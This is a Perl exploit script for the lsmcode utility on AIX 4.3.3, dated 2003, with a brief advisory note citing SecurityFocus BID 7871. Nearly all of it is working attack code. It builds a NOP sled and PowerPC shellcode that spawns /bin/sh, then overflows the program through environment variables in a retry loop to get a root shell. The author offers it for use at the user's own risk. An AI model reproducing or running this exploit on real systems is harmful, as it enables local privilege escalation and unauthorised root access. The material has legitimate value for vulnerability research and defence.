49 lines
1.7 KiB
Perl
Executable file
49 lines
1.7 KiB
Perl
Executable file
source: http://www.securityfocus.com/bid/7871/info
|
|
|
|
Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges.
|
|
|
|
#!/usr/bin/perl
|
|
# FileName: x_lsmcode_aix4x.pl
|
|
# Exploit lsmcode of Aix4.3.3 to get a uid=0 shell.
|
|
# Tested : on Aix4.3.3.Mybe can work on other versions.
|
|
# Author : watercloud@xfocus.org
|
|
# Site : www.xfocus.org www.xfocus.net
|
|
# Date : 2003-6-1
|
|
# Announce: use as your owner risk!
|
|
|
|
$CMD="/usr/sbin/lsmcode";
|
|
$_=`/usr/bin/oslevel`;
|
|
|
|
$XID="\x03";
|
|
$UID="\x97";
|
|
print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n";
|
|
print "From: [ www.xfocus.org 2003-6-1 ].\n\n";
|
|
|
|
$NOP="\x7c\xa5\x2a\x79"x800;
|
|
%ENV=();
|
|
|
|
$ENV{CCC}="A" .$NOP.&getshell($XID,$UID);
|
|
$ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300;
|
|
$ret = system $CMD ,"-d","a";
|
|
|
|
for($i=0;$i<4 && $ret;$i++){
|
|
for($j=0;$j<4 && $ret;$j++) {
|
|
$ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID);
|
|
$ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300;
|
|
$ret = system $CMD ,"-d","a";
|
|
}
|
|
}
|
|
|
|
#sub
|
|
sub getshell($XID,$GID) {
|
|
my $SHELL,($XID,$GID)=@_;
|
|
$SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd";
|
|
$SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0";
|
|
$SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6";
|
|
$SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff";
|
|
$SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78";
|
|
$SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1";
|
|
$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
|
|
return $SHELL;
|
|
}
|
|
#EOF
|